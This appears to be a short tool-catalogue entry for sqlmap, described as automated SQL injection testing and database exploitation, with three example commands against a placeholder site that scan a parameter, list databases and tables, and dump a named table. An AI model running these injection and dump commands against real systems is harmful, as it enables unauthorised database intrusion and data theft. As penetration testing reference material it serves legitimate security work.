Automated SQL injection testing and database server exploitation
Penetration testing for SQL injection and database servers
sqlmap$ sqlmap -u 'http://target.com/page.php?id=1'$ sqlmap -u 'http://target.com/page.php?id=1' --dbs --tables$ sqlmap -u 'http://target.com/page.php?id=1' -D database_name -T table_name --dump